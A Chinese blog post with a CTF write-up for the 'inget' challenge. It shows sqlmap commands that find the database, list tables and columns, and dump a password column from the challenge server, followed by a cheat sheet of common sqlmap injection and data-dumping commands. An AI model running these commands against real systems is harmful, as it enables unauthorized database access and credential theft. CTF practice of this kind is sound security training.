当前位置:   article > 正文

攻防世界-宜兴网信办-inget_宜兴网信部门

宜兴网信部门

题目

访问题目路径

 这个题目的意思就是请输入ID,然后尝试绕过,那应该就是SQL注入,但是呢,我是个懒狗,我直接跑sqlmap

先跑数据库名

sqlmap "http://61.147.171.105:51322/?id=1" --current-db

爆表

sqlmap "http://61.147.171.105:51322/?id=1" -D cyber --tables

爆字段

sqlmap "http://61.147.171.105:51322/?id=1" -D cyber -T cyber --columns

 

爆数据

sqlmap "http://61.147.171.105:51322/?id=1" -D cyber -T cyber -C "pw" --dump

 

 sqlmap常用命令

注入检测方式:

get方式:sqlmap.py -u "URL"

post方式:sqlmap.py -u "URL" -date "post数据"

cookie方式:sqlmap.py -u "URL" -cookie "cookie数据"

获取数据库信息

获取数据库类型以及版本:sqlmap.py -u "URL"

获取网站使用的数据库名和用户名:sqlmap.py -u "URL" --current-db

                                                          sqlmap.py -u "URL" --current-user

获取数据量和用户权限

获取数据库的数据量:sqlmap.py -u "URL" --count -D "数据库名"

判断用户权限:sqlmap.py -u "URL" --privileges

Mysql注入

首先获取当前库名:sqlmap.py -u "URL" --current-db

其次获取库中表名:sqlmap.py -u "URL" --tables -D "数据库名"

然后获取库中某个表的列名:sqlmap.py -u "URL" --columns -T "表名" -D "库名"

最后获取库中某个表名的某个列名的字段内容:sqlmap.py -u "URL" --dump -C "列名" -T "表名" -D "库名"

本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号